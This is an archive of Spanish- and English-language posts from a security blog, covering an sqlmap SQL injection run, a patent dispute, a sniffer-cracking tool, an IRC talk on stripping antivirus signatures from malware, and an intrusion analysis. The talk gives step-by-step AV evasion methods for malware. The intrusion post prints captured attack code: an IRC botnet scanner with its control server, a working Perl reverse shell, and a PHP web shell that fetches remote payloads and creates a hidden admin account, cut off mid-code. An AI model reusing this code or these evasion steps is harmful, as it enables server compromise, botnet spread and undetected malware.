Security Dojo » » Security

SQLMap query problems

nahual — Tue, 27 Sep 2011 15:22:00 +0000

Well, I run with psymera a CTF game and we are constantly adding new VMWare machines and new tests just to keep on playing and not get bored. As part of a internal training where I work I started to create some videos on how to use SQLMap (I promise to upload here shortly in a big rant about it) so I started on what everyone does: update your version.

And something interesting happened, sqlmap enumeration broke (gorgeous) but it didn’t look much like it, it baffled me at first, so much that I had to do all by hand and asked psymera if he changed something, he said no.

So this is the info of the updated sqlmap version to that date:

root@fsckOSX:/pentest/database/sqlmap# svn info Path: . URL: https://svn.sqlmap.org/sqlmap/trunk/sqlmap Repository Root: https://svn.sqlmap.org/sqlmap Repository UUID: 7eb2e9d7-d917-0410-b3c8-b11144ad09fb Revision: 4380 Node Kind: directory Schedule: normal Last Changed Author: stamparm Last Changed Rev: 4380 Last Changed Date: 2011-09-19 12:08:08 -0700 (Mon, 19 Sep 2011)

the SVN rev is 4380, latest at Sep 19th, here is the example of a run against the vulnerable web server with this revision.

root@fuckOSX:/pentest/database/sqlmap# ./sqlmap.py -u "http://XXX.XXX.XXX.XXX/index.php?page=search" --data="search=aaa" --dbs


    sqlmap/1.0-dev (r4380) - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 14:26:22
[14:26:22] [INFO] using '/pentest/database/sqlmap/output/XXX.XXX.XXX.XXX/session' as session file

[14:26:22] [INFO] resuming injection data from session file

[14:26:22] [INFO] resuming back-end DBMS 'mysql 4' from session file

[14:26:22] [INFO] testing connection to the target url

[14:26:23] [WARNING] there is a DBMS error found in the HTTP response bodywhich could interfere with the results of the tests

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: POST

Parameter: search

    Type: UNION query

    Title: MySQL UNION query (NULL) - 1 column

    Payload: search=aaa' UNION ALL SELECT CONCAT(CHAR(58,107,98,119,58),CHAR(82,88,103,80,76,100,72,90,73,105),CHAR(58,116,99,109,58))# AND 'MXBu'='MXBu

---
[14:26:23] [INFO] the back-end DBMS is MySQL

web server operating system: Linux CentOS 4

web application technology: PHP 4.3.9, Apache 2.0.52

back-end DBMS: MySQL 4

[14:26:23] [WARNING] information_schema not available, back-end DBMS is MySQL < 5. database names will be fetched from 'mysql' database

[14:26:24] [WARNING] if the problem persists with 'None' values please try to use hidden switch --no-cast (fixing problems with some collation issues)

[14:26:24] [WARNING] the SQL query provided does not return any output

available databases [1]:

[*]
[14:26:24] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/XXX.XXX.XXX.XXX'

[*] shutting down at 14:26:24

So note the

available databases [1]:
[*]

This is interesting, it FINDS the database apparently but there is no name for it. This is the part that had me baffled (obviously the table enumeration, the column enumeration failed as it didn't know the database name)

So I started to update back, some versions (such as 4320) would even crash on run (this is normal as sqlmap is a very active project) so after a while i found the last revision that worked

root@fuckOSX:/pentest/database/sqlmap# svn update -r 4319 D _sqlmap.py U xml/payloads.xml U plugins/dbms/sybase/enumeration.py U plugins/generic/enumeration.py U sqlmap.conf U sqlmap.py U doc/FAQ.pdf U doc/README.html U doc/README.pdf U doc/THANKS U doc/README.sgml U lib/takeover/web.py U lib/takeover/metasploit.py U lib/utils/hash.py U lib/controller/checks.py U lib/controller/controller.py U lib/core/common.py U lib/core/threads.py U lib/core/agent.py U lib/core/settings.py U lib/core/dump.py U lib/core/defaults.py U lib/core/option.py U lib/core/optiondict.py U lib/request/connect.py U lib/request/comparison.py U lib/request/basic.py U lib/techniques/blind/inference.py U lib/techniques/union/use.py U lib/techniques/union/test.py U lib/techniques/error/use.py U lib/parse/cmdline.py D tamper/unmagicquotes.py Updated to revision 4319.

Notate how lib/techniques/ had some changes, but changes from latest revision to this one are more than that, so it's a compromise for now.

So here is this revision against the same vulnerable web server.

root@fsckOSX:/pentest/database/sqlmap# ./sqlmap.py -u "http://XXX.XXX.XXX.XXX/index.php?page=search" --data="search=aaa" --dbs


    sqlmap/1.0-dev (r4319) - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 14:26:53
[14:26:53] [INFO] using '/pentest/database/sqlmap/output/XXX.XXX.XXX.XXX/session' as session file

[14:26:53] [INFO] resuming injection data from session file

[14:26:53] [INFO] resuming back-end DBMS 'mysql 4' from session file

[14:26:53] [INFO] testing connection to the target url

[14:26:54] [WARNING] there is a DBMS error found in the HTTP response bodywhich could interfere with the results of the tests

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: POST

Parameter: search

    Type: UNION query

    Title: MySQL UNION query (NULL) - 1 to 10 columns

    Payload: search=aaa' UNION ALL SELECT CONCAT(CHAR(58,107,98,119,58),CHAR(82,88,103,80,76,100,72,90,73,105),CHAR(58,116,99,109,58))# AND 'MXBu'='MXBu

---
[14:26:54] [INFO] the back-end DBMS is MySQL

web server operating system: Linux CentOS 4

web application technology: PHP 4.3.9, Apache 2.0.52

back-end DBMS: MySQL 4

[14:26:54] [WARNING] information_schema not available, back-end DBMS is MySQL < 5. database names will be fetched from 'mysql' database

[14:26:54] [WARNING] if the problem persists with 'None' values please try to use hidden switch --no-cast (fixing problems with some collation issues)

[14:26:54] [WARNING] it was not possible to count the number of entries for the used SQL query. sqlmap will assume that it returns only one entry

[14:26:56] [INFO] fetching number of databases

[14:26:56] [ERROR] unable to retrieve the number of databases

[14:26:56] [INFO] falling back to current database

[14:26:56] [INFO] fetching current database

[14:26:56] [INFO] read from file '/pentest/database/sqlmap/output/XXX.XXX.XXX.XXX/session': pwnetwork

available databases [1]:

[*] pwnetwork
[14:26:56] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/XXX.XXX.XXX.XXX'
[*] shutting down at 14:26:56

root@fsckOSX:/pentest/database/sqlmap#

Here it is!!!

available databases [1]:
[*] pwnetwork

Just my 2 cents, this has been verified by other people and I hope if someone uses the tool and suddenly scratches his head can rollback to the working revision while sqlmap developers fix this (You guys are awesome keep the excellent work!!!)

stop232patent.com

nahual — Tue, 15 Feb 2011 02:04:27 +0000

I’ve been in the security environment for quite around years now, I don’t consider myself an expert but I consider myself knowledgeable, one thing is all my life I’ve had awesome people around me, giving me always advise, knowledge and pushing my creativity.

I recently catch upon Cenzic having a pretty interesting patent, which basically covers any code that baselines a web page and then injects faulty code into parameters to verify vulnerabilities. Yes you read correctly, this patent awarded in 2007 covers all web scanners and even powerful fuzzers into the patent, why it was granted? beats me I presume whoever checked it out didn’t really find prior art (there is) or really understand what was being patented (go lawyer+techie talk) the result? an overlapping patent.

Now a patent should ALWAYS be used defensively, which means “I protect myself from other people coming and breaking my stuff, asking me for money for something I developed or saying I didn’t create it” the problem is, Cenzic is NOT using the patent defensively, they are using it to get money out of web scanner companies.

IBM/HP already did a cross licensing deal with them, (probably giving them their crawler technology) and now they went and asked NTObjectives an insane amount of money, result? NTObjectives is fighting back, the filed a suit which will then break the patent and stop this company from basically extorting money out of other companies for a very generic and broken patent.

It makes me sad, why? because one of the patent owners is someone I really respect: Greg Hoglund, the founder of rootkit.com, his books are great and I love them, but this patent, this is wrong. It saddens me the fact that someone on the security environment (I hate using the industry word, because grayhats and blackhats are not on the industry but are still on the environment) would do this and let it go.

I created then the website www.stop232patent.com you can follow an in depth detail of the analysis of the patent, trial, prior art, etc.

Where information should stop

nahual — Wed, 04 Aug 2010 01:36:52 +0000

I often stay away from political and economical sources, why? well due to my job and research I believe I should not be involved in any of them, is my job not to be bias against nobody that could potentially be my client, so I just shut up, even with close relatives, friends and relationships.

As the release of trapper was getting closer I started thinking what good would the complete release of the software will do, and I came up with this answers:
- Nothing, nobody would use it
- Some people would use it for kicks, mostly to hack their own networks or hack work
- It could be used to crack something large and big
- Other people would use it on their audits, call me I’m finished and keep on using my research and work.
- Man in black would seize my server (since it’s on the US) and force the app to be erased after magically appearing with a copy of it.

While the last one appears definitely far fetched the third one got me thinking seriously, not only because of the nature of my research has gone definitely into Hydras and AI / Neural Networks / Expert Systems but because potentially sooner or later it could be pushed into the light and someone will do something that would compromise the years I’ve work on the security field.

I’m not calling that a reporter, as the ones I know they have been always fair to me in developing at story, but today as I unleashed the third rewrite of trapper (yes I had to rewrite 2 times already due to redesign of the objects) someone at the starbucks checked their email via pop, in less than 5 minutes all his email was parsed, loged into facebook, found, friends found, had his avatar picture and was searching who he was talking to in MSN. At that second I realized I stupidly left the domain into * and not localhost, definitely my mistake but … it suddenly hit me, am I making stuff secure or insecure releasing this?

The answer was “You are making stuff completely insecure, people won’t understand what is going on, it will be just pure blood and your point across will be lost” so my decision is to open trapper only to a few people without hard modules and keep it for Yaguarete as part of the internal tools, not because I don’t want to, believe me with the design I made a proficient coder will have no trouble to create it’s own little hydra, but it won’t me mine, it won’t be code breaking hard into stuff I seriously do not want to even ping.

YES I’ve become soft, YES I’m not the guy who used to rampage like 10 years ago in G-Con, but then again who would be? are you really a sane person holding into something that happened or said 10 years ago? is your life THAT pathetic?

I’ve seen people come from total “n00bs” into amazing hackers, like HKM I remember him messaging me saying he got hist first overflow after reading a paper then all the sudden he is destroying 2Wire with amazing research, people evolve, everything evolves, why wouldn’t I just evolve?

As I was reading the leaks that might break spies and complete networks of the CIA on Afganistan because of a leak I said “well sure government did stuff they shouldn’t have done? most probably but then again should documents leak THAT harshly?” I’m not condemning or applauding the act I just wondered “what if code I wrote ever is used for that?”

You might not have met me in my “worst” years, when I tough I was invincible, when nobody was smarter than me, more connected than me, etc. but I realize that those years I did more damage than help, I turn around and I smile when people tell me they look up to me and they have shaped cons in the sense of G-Con or stuff like that (I have to say that having someone name his kid after you felt great, thank you Pedro Navarro -byteStriker-)

Anyway I’m still alive, am I the same? no, is my research the same? probably is it still agressive? As much as I need to, because at the end, my research is only for me now, I don’t want any more fame, I don’t want the spotlight anymore, I’ve had my 15 minutes of fame, I want to do what I like, what I want and just be happy (breaking stuff sure why not)

Will trapper ever be public? to be honest it might, just not right now I’d like to keep the advantage before other companies use it and call my company inferior, anyway it will have a mixed license so too bad for ppl that will use it for commercial.

If you are interested in a copy of it, contact me and we can chat but I don’t promise anything.

Trapper from sniffer to hydra

nahual — Sun, 13 Jun 2010 18:45:57 +0000

This is the presentation I’m going to push in Campus Party and in Sec-T in Sweden in september.

This is a complete recode of trapper, even changing the language for ruby, having namespaces on it and the capabilities to attack and exploit miss-configurations.

I’m going to be exporting a git repository the first week of August with the public version of Trapper 1.0 in git.security-dojo.com (It’s not setup yet so don’t even try) and version 1.1 should hit around september in Sec-T.

What stuff is being coded or tested now?

- Sniffing
- Cracking the hashes
- Using hashes to bring more hosts into the game
- Reading emails
- Reading applications
- SSH and telnet into hosts
- Start other sniffer heads in different OS (This is going to take time but oh well)
- More to come!

If you are interested in beta testing Trapper drop me an email, you might not get the chance since I’m really picky on who betas my stuff but you can try :P

Muerte al RunPE…

psymera — Fri, 31 Jul 2009 05:51:44 +0000

Bien aki mi ultima creacion para matar todos esos crypters chafas okupados por gran cantidad de malware

para ser indetectables a los AV’s

esta tool se basa en que todo los programas ke okupan el runpe como tecnica para ejeucion en memoria

termina siendo igual sin importar el tipo de cambio ke s ele haga

ya ke es un metodo muy poko flexible y porlotanto muy vulnerable

bueno esta herramienta me costo varias semanas de investigacion y desarrollo

esta echa en delphi y masm(primera vez ke trabajo en forma con asm xP)

sin mas aki les dejo este juguetito junto con su screenshot correspondiente

http://www.gigasize.com/get.php?d=b32byccdznf

Machancando AV’s

psymera — Mon, 16 Mar 2009 22:54:40 +0000

Bien ahora para iniciar en este blog

el log de una charla ke di en un canarl irc sobre las firmas de los av’s

y como kitarselas a nuestros juguetitos experimentales xP

ah si no les comente mi gato se llama antivirus
y es la onda xxD
jajajaja
Juar!
Llamaba….
neta?
~
que cool
XD
se murio
no ese es otro
./cry
lo compro symantec
era la particion ToT
XD
lol
xD
Xd
bueno ahora si me pondre serio ( aja xD)
no, ya enserio hablales chimero por que estamos perdiendo auditorio
hablen
(es el chiste para no hacer ridiculo en grande)
jajaja
bueno ya xD
como todos sabemos hay tres metodos conocidos de detecion de virus XD
por Firmas
por heuristica
y la ahora tan famosa y sonada proactiva( como la bautiso el kaspersky)
bueno las Firmas son basico encontrar un archivo con siertos valores en ekis direccion
haci nos detecta faiclmente ke tenemos un mydoom.abx
o etc
la heuristica okupa tanto firmas muy comunes en offsets, como la tabla de importaciones del archivo
y la famosa proactiva (aja XD) ke no es mas ke hookear las apis del sistema
y haci cogernos de los eggs xP
en si nos enfocaremos ah la heuristica por ke es la divertida y facil de parchar XD
y con eso nos llevamos firmas entre las panteras xP
en si es una vercion modificada sobre las firmas clasicas las cuales tmb las cheka en memoria xP
por eso aun ke le pongamos upx o demaz compresores al cargarlo en memoria nos detectara facilmente
bueno para kitar firmas hay varias tecnicas
de las conocidas esta la RIT, MEEPA y hex XD
hoenstamente de estas tres ke son als mas conocidas la hex es una ke se basa solamente en la suerte para ke sea funcional
y las otras dos es necesario conocimiento mas o menos decente de asm
bueno para poder hacer todo esti primero tenemos ke encontrar las firmas ke hay ke modificar
lo mas basico ke necesitamos, block de notas, hex editor y el AV del cual keremos sacar los offsets
primero una carpeta la excluimos del scaneo por parte de nuestro AV
ahi guardaremos nuestro kerido malware ke no distribuiremos y solo lo haremos por experiementacion ( aja :p)
lo vamos abrir con nuestro hex editor y vamos ah rellenar la mitad de el con bytes nulos XD y guardamos esa copia modificada en una carpeta ke si sea escaneada por nuestro av residente
el chiste de esto
es ke nos lo detecte el av
y nos borre esa muestra
o la kite o grite o lo ke sea ke haga el Av xP
el chiste es buscar el lado donde no nos indike ke fue encotnrado
apartir de ello trataremos de redusir la buskeda
osea volvemos au nuestro hex editor y rellenamos denuevo pero en un espacio mas pekeño
haci ke con mucha pasiencia cafe y musica podemos sacarlo manualmente
muchas de las veces( por no decir ke todas) nuestro rat packer o lo ke sea es detectado por varias firmas
entonces tenemos ke ir haciendo pekeños rellenados con el hex editor
y para no perdernos okupamos nuestro notepad para guardar neustro avanze y no kedar dañados con tanto numero XD
bueno esta tarea se puede simplificar okupando herramientas espesificas como son
signature cero, AVDevil y varias mas
ke lo ke hacen es hacer este rellenado pero de una forma mas burda por llamarlo de una manera
ya ke van creando ejemplares con blokes de un taaño determinado
estas eran utiles o bueno lo son cuando nuestro AV es detectado por una sola firma
(bien ahroa el super comercial de mi tool xD)
go go go go!!
bueno por ese motivo yo cree la herramienta AAVTools (Anti AntiViral Tools) ke sirve para identificacion de multiples firmas
esta basada en la idea principal de signature cero de darnos una apariencia mas amigable en la deteccion de firmas
poniendonos una linda barrita la cual reprecentara el cuerpo de nuestro amado malware xP
(termina comercial, al final sabran como cosnegirlo con faciles pagos de 9.95 xD)
bueno suponiendo ke ya tenemos nuestra lista de firmas
okuparemos la tecnica ke mas nos guste o acomode
(bueno primero para tirarle tierra a la hex XD)
se trata de teniendo nuestra firma okuparemos un hex editor para ver su valor y sumarle o restarle un valor para ke no sea detectado
oviamente esto kitara la firma detectada pero lo ams provable es ke mate el flujo del programa
ya ke estamos moviendo valores ah ciegas
la tecnica rit se basa en mover un bloke de instrucciones ah otra parte del programa y volver al flujo normal
y la meepa es una vercion modificada de la rit
pero podriamos decir ke mas practica
se trata de modificar los valores con un hex editor ah nuestro programa original y ponerle una rutina al principio del mismo ke nos vuelva a poner los valores originales pero en memoria
bueno para cualkiera de estas dos tecnicas necesitamos encontrar caverns en nuestro programa
asi es como se ve el tool de psymera (bueno la version anterior): http://img264.imageshack.us/img264/8896/screenshotpq6.jpg
ke no son mas ke huecos ke deja el compilador ah la hora de crearlo para mantener alineadas las direcciones en memoria o demaz xP
para ello hay varias tool; PEID, un script de ollydbg, topo(herramienta especialisada en ello) y otras mas
(cof cof la nueva vercion de mi tool ya hace tmb esa funcion)
pero bueno la mas okupada es el topo
esta herramienta nos da la opcion de buscar un tamaño minimo de la caverna o de no ayarlo aumentar el tamaño de alguna seccion o añadir una nueva para tenerlo
la mayoria de las veces no necesitamos okupar esas dos ultimas opciones
pero bueno volviendo ah la rit
abriremos ahora nuestro malware a modificar en en ollydbg
y buscaremos nuestra offset
bueno para ayarla se me olvido decirles tmb xP
ke okuparemos saber el valor de la imagebase del programa
para sumarlo ah nuestro offset y tener nuestra direccion como RVA XD
bueno teniendo la RVA del offset la buscaremos en el olly
bueno primero buscamos nuestra firma ke es detectada
como es un solo byte generalmente okupara parte de intruccioens mas grandes
por ejemplo supongamos ke nuestra firma tiene un valor f6
y la encontramos en estea instruccion
00403505 31F6 XOR ESI,ESI
bueno copiaremos esta intruccion ah nuestro block de notas xP
ademas de las siguientes tres
00403505 31F6 XOR ESI,ESI
00403507 8932 MOV DWORD PTR DS:[EDX],ESI
00403509 5F POP EDI
0040350A 5E POP ESI
esto es por ponerles un ejemplo
y guardamos la direcciond e la siguiente instruccion
bien ya teniendo nuestro bloke de instrucciones okuparemos nuestra caverna
de igual forma ke sacamos la RVA de la firma
sacamos la caverna y nos dirigimos ah ella
y copiaremos nuestro bloke de instrucciones ke copiamos ah ella
al terminal el bloke le añadiremos un JMP 0040350B ke es en nuestro caso la siguient insutrccion ke se ejecutaria en el programa
y volvemos denuevo a la direccion de nuestra firma
y ah la intruccion la sobreescribiremos con un JMP direccion_de_la_cave
y ya guardamos nuestro ejecutable modificado y lo corremos para provarlo
el AV no nos lo deve de tomar como espesimen o en todo caso ke aun nos detecte lo hara como una variante diferente o como otro malware, por las firmas detectadas
que pasa si el programa hace referencia a la memoria que desplazamos? por ejemplo si es un for que tiene como marcador de inicio la instruccion 403509 o algo asi..
se muere el programa supongo, no seria mas eficiente colocar instrucciones equivalentes?
para eso existe la tecnica meepa xP
como en ese xor esi esi, un mov esi 0
ke es una vercion refinada de la rit o pordriamos buscar otras firmas mas sencilla ke sean detectadas
aun ke si es valido como lo dices pero el problema es ke igual no son del mismo tamaño las intrcciones
ah sisi
eso es verdad
entocnes tendriamos ke mover mucho las direccion y demaz
pero la de meepa recrea el virus en memoria no?
haci es
muchos antivirus checan tambien la memoria no?
no solo el archivo
en parte
hacen un chekeo en memoria pero solo X instricciones o tiempo al principio
ah vaya
bueno deja explico mepa xP rapido para regrear ah esto
bueno tal como sdc comento mepa se trata de recostruir el programa en memoria
esto se hace teniendo las offsets y sus valores originales
al principio del programa antes de cualkier instruccion crea un salto a una cave
la cual contiene un codigo ke regenera los valores en memoria ah su estado original
y despues regresa al flujo normal del programa
por lo cual muchas firmas dificiles de modificar o sencibles ya no lo son
pero bueno aki encotnramos el problema del analizis en memoria
los antivirus igual nos buscan las firmas una vez cargado en memoria y durante los primeros X ciclos de ejeccion
entre ello va la simulacion de ejecuccion para buscar firmas o rutinas sospechosas
pero bueno esto no es una labor infinita o ke se mantenga ah lo largo de toda la ejecucion
Psymera> por lo mismo ke es demaciado costoso en recursos
y gracias ah ello podemos evitar mucha deteccion cuando somos geniales en asm y sabemos meter unas buenas rutinas haci en bruto en las cavernas o teniendo el codigo fuente
jajaja..
por ejemplo karsperky es muy facil de saltar su heuristica por ello mismo
por poner un ejemplo comunmente okupado en malware echo en vb
es el de poner un timer ah X cantidad de mili segundos y ese a su vez active otro timer y haci ssesivamente XD
aun ke bueno se puede hacer on uno solo y solo okupar un bloke
o okpar un hilo
el chiste es ke okupemos esa cantidad de chekeos ke tiene permitido hacer
Psymera> y con ello saltarnos su heuristica
esto de igual forma podemos implementarlos con las tecnicas ke comente anteriormente para introduccion de codigo
bien bueno
preguntas comentarios
mentadas? XD
me falto algo? xP
tu tool lo pondre en el log de la platica
attacheado al post
vap xP
esta muy chinga la tool
bien de perdida refreskenmela XD
no pues estuvo buena la exposicion del meepa
Se me hizo interesante todas las formas diferentes de brincar las firmas, y es lo mismo para packers y crypters y demas?
haci es
eip!! meepa rulez!! or algun killav
no me gustan en lo personal los killav
por?
no son etikos jajajaja
son poko artisticos y chillan mucho
cuando vez ke el iconito del AV ya noe sta en el task
te espantas
lol
verga que le hice!
te paniqueas tu
esactamente eso ,xd
en ves de la compu
si me ah pasdo jeejejej
que eliminas cosas que no querias
tienen su chiste pero si hicieras tu colecc de icons
asi nomas cuelgas un icono basura pa que no se den cuenta jajaja y hasta los procesos fakeaz
esta bien eso
pero honestamente ah mi me gusta mas la parte romantica de uno contra la compañia completa del AV XD
pues tambien es jocoso uno contra el av
muy bien pues con eso terminamos las platicas
deberias hacer un killav que ponga un icono que sea iwal al antivirus que usas
pos aprendimos mucho ahora
y no haga nada, nomas este ahi
sdc es lo que io decia
seh buena idea
xD
jajajaja
valio la pena la espera
y la desvelada

Analisis de una Intrusion y un bot

nahual — Tue, 20 Jan 2009 01:52:16 +0000

Est es una mini caso de estudio sobre lo que encontre hace poco en un servidor que tuvo una intrusion, veian como se cargaba el servidor en CPU y memoria y obviamente se cargaba por el acceso a I/O y todos los procesos de escan que hacian sin piedad, donde quedaron los tiempos donde tenias hackers que eran INVISIBLES y no inservibles? pero bueno que se yo no? jajajajaja

Bueno me toco ayudar a una persona que le hicieron una intrusion con inclusion de codigo, es bastante interesante porque se vio ejecutar perl Scan009.txt que me llamo la atencion y lo consegui del sitio donde bajo el botnet el ataque:

http://matudesign.com/dh/imagenes/Scan2009.txt

#!/usr/bin/perl

  ##################################################################
  ##                                                                                 ##
  ##                                                                                 ##
  ##                                                                   05/06/2008    ##
  ##  Author  : BitchX and Osirys                                                    ##                                                             ##
  ##  Team    : FullNetWork                                                          ##
  ##  Ircd    : irc.fullnetwork.org                                                  ##
  ##  WebSite :                                                                      ##
  ##  Contact : safes[dot]modes[at]gmail[dot]com                                     ##
  ##                                                                                 ##
  ##                                                                                 ##
  ##  Release: v1 Private                                                            ##
  ##                                                                                 ##
  ##                                                                                 ##
  #####################################################################################

### !!_/ PRIVATE

use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;

#######################################################
## CONFIGURATION                                     //
#######################################################

my $id    = "http://matudesign.com/dh/imagenes/02.txt??"; #Your RFI Response
#Shell printed on the Vulnerable Site
my $shell = "http://matudesign.com/dh/imagenes/cmd-shell.txt??";
my $ircd  = "64.136.61.195";
my $port  = "7000";
my $chan1 = "#offspring"; #Chan for Scan
my $chan2 = "#offspring"; #bot will be printed here too
my $nick  = "[D]PRIVATE".(int(rand(100)));
my $sqlpidpr0c = 1; # This is the number of sites that the bot will test in the same time.
#For an accurated scann, it's reccomended to set a low number(1)
# (Expecially if you are scanning on 0day bugs), so a lot of presunted vulnerable sites.
#Unless you will see the bot exiting by an excess flood!
# Instead, if you are scaning on old bugs, so not many results,
# you can put a higher number, so more speed.
my $rfipidpr0c = 50;
my @User_Agent = &Agent();

### USEFULL OPTIONS ( 0 => OFF  ;  1 => ON )

my $spread = "http://matudesign.com/dh/imagenes/01.txt??";

my $spreadACT = 0; #0 ->disabled, 1 ->enabled
my $securityACT = 0; #0 ->disabled, 1 ->enabled

my $killpwd = "lol"; #Password to Kill the Bot
my $chidpwd = "lol"; #Password to change the RFI Response
my $cmdpwd = "lol"; #Password to execute commands on the server
my $secpwd = "lol";
my $spreadpwd = "lol";

my $badspreadpwd != $spreadpwd;
my $badkillpwd != $killpwd;
my $badidpwd != $chidpwd;
my $badcmdpwd =! $cmdpwd;

#######################################################
## END OF CONFIGURATION                              //
#######################################################

open( $f1le, ">", "rm.txt" );
print $f1le "\#!/usr/bin/perl\n";
print $f1le "exec(\"rm -rf \*siti\*\")\;\n";
close $f1le;

my $sys = `uname -a`;
my $up = `uptime`;

if ($spreadACT == 0) {
    $t5 = "OFF";
}
elsif ($spreadACT == 1) {
    $t5 = "ON";
}

if ($securityACT == 0) {
    $y5 = "OFF";
}
elsif ($securityACT == 1) {
    $y5 = "ON";
}

$k=0;

if ( fork() == 0 ) {
    &irc( $ircd, $port, $chan1, $chan2, $nick );
}
else {
    exit;
}

... LONG BORING CODE AVAILABLE ON DEMAND ...

## PRIVATE
## Coded by BitchX and Osirys

Este script esta intersante, esta hecho para tomar comandos desde IRC para hacer scans masivos, infectar mas servers y agregarlos dentro de la botnet y reportarse (me encantaron sobre todo los passwords en los que podemos tomar control de la botnet nosotros mismos) asi tambien agregaron y ejecutaron los siguientes scripts:

http://matudesign.com/dh/imagenes/02.txt

#!/usr/bin/perl

use IO::Socket;

#IRAN HACKERS SABOTAGE Connect Back Shell          

#code by:LorD

#We Are :LorD-C0d3r-NT                                           

#Email:LorD@ihsteam.com

#

#lord@SlackwareLinux:/home/programing$ perl dc.pl

#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--

#

#Usage: dc.pl [Host] [Port]

#

#Ex: dc.pl 127.0.0.1 2121

#lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121

#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--

#

#[*] Resolving HostName

#[*] Connecting... 127.0.0.1

#[*] Spawning Shell

#[*] Connected to remote host

#bash-2.05b# nc -vv -l -p 2121

#listening on [any] 2121 ...

#connect to [127.0.0.1] from localhost [127.0.0.1] 32769

#--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--

#

#--==Systeminfo==--

#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux

#

#--==Userinfo==--

#uid=1001(lord) gid=100(users) groups=100(users)

#

#--==Directory==--

#/root

#

#--==Shell==--

#

$system	= '/bin/sh';

$ARGC=@ARGV; 

print "--== ConnectBack Backdoor Shell vs 1.0 by xiP / eu kero comprar meu carroOOOo..!!! ==-- \n\n"; 

if ($ARGC!=2) { 

   print "Usage: $0 [Host] [Port] \n\n"; 

   die "Ex: $0 127.0.0.1 2121 \n"; 

} 

use Socket; 

use FileHandle; 

socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n"; 

connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n"; 

print "[*] Olhando o servidor...\n";

print "[*] ConectandO... $ARGV[0] \n"; 

print "[*] Spawning Shell \n";

print "[*] Connected to remote host \n";

SOCKET->autoflush(); 

open(STDIN, ">&SOCKET"); 

open(STDOUT,">&SOCKET"); 

open(STDERR,">&SOCKET"); 

print "--== ConnectBack Backdoor vs 1.0 by by xiP / eu kero comprar meu carroOOOo..!!! ==--  \n\n"; 

system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;

echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- "); 

system($system);

#EOF

Ojo con el MAESTRO del system (me preugnto yo para que hacer tanto show y que pasa si no esta el command o peor eso se ve fuertisimo pero bueno no podemos pedir demaciado, jejejejeje

Y esta preciosura tambien:


 
TAG html TAG
TAG head TAG
TAG meta content="text/html; charset=ISO-8859-1" http-equiv="content-type" TAG
TAG /head TAG
TAG body TAG

';
 mail("math3us1m@hotmail.com", $asunto, $msg, $cabeceras);
 ?>


Manda un email a math3us1m@hotmail.com avisandole del hack, mandemosles muchos y muchos correos de hack! jajajaja porque no?
Y para mantener el control usan: http://matudesign.com/dh/imagenes/cmd-shell.txt
TAG html TAG
TAG head>
TAG meta http-equiv="Content-Language" content="pt-br">
TAG meta name="GENERATOR" content="Microsoft FrontPage 5.0">
TAG meta name="ProgId" content="AoD">
TAG meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
TAG title>My life is Crazy Man TAG/title>
TAG style type="text/css">
A:link {text-decoration:none}
A:visited {text-decoration:none}
A:hover {text-decoration:underline}
A:active {text-decoration:underline}
body,td {
 font-family: verdana;
 font-size: 8pt;
 background-color: #006600;
}
a{
 color: #0000FF;
 text-decoration: none;
}
a:hover {
 color: #FF0000;
 text-decoration: underline;
}
TAG /style>
TAG /head>
TAG body >
TAG center>
 --== ?YOUNGEST? Hack Shell==-- 


TAG ?php

 @set_time_limit(0);

 $string = $_SERVER['QUERY_STRING'];
 $mhost = 'http://www.freewebs.com/segunogunyemi/derrr.jpg?';
 $host_all = explode("$mhost", $string);
 $s1 = $host_all[0];
 $fstring = $_SERVER['PHP_SELF']."?".$s1.$mhost;

 $OS = @PHP_OS;
 $IpServer = '127.0.0.1';
 $UNAME = @php_uname();
 $PHPv = @phpversion();
 $SafeMode = @ini_get('safe_mode');

 if ($SafeMode == '') { $SafeMode = "OFF"; }
 else { $SafeMode = "$SafeMode"; }

 $btname = 'backtool.txt';
 $bt = 'http://www.smashed-radio.com/forum/cmds.txt';
 $dc = 'http://www.smashed-radio.com/forum/cmds.txt';
 $newuser = '@echo off;net user Admin /add /expires:never
/passwordreq:no;net localgroup

"Administrators" /add Admin;net localgroup "Users" /del
Admin';
 $bn = 'http://www.smashed-radio.com/forum/cmds.txt';
// Java Script
 echo "TAG script type=\"text/javascript\">";

 echo "function ChMod(chdir, file) {";
 echo "var o = prompt('Chmod: - Contoh: 0777', '');";
 echo "if (o) {";
 echo "window.location=\"\" + '{$fstring}&action=chmod&chdir=' + chdir +
'&file=' + file +

'&chmod=' + o + \"\";";
 echo "}";
 echo "}";
 echo "function Rename(chdir, file, mode) {";
 echo "if (mode == 'edit') {";
 echo "var o = prompt('Ganti Nama File '+ file + ' menjadi:', '');";
 echo "}";
 echo "else {";
 echo "var o = prompt('Ganti Nama Folder '+ file + ' menjadi:', '');";
 echo "}";
 echo "if (o) {";
 echo "window.location=\"\" + '{$fstring}&action=rename&chdir=' + chdir +
'&file=' + file +

'&newname=' + o + '&mode=' + mode +\"\";";
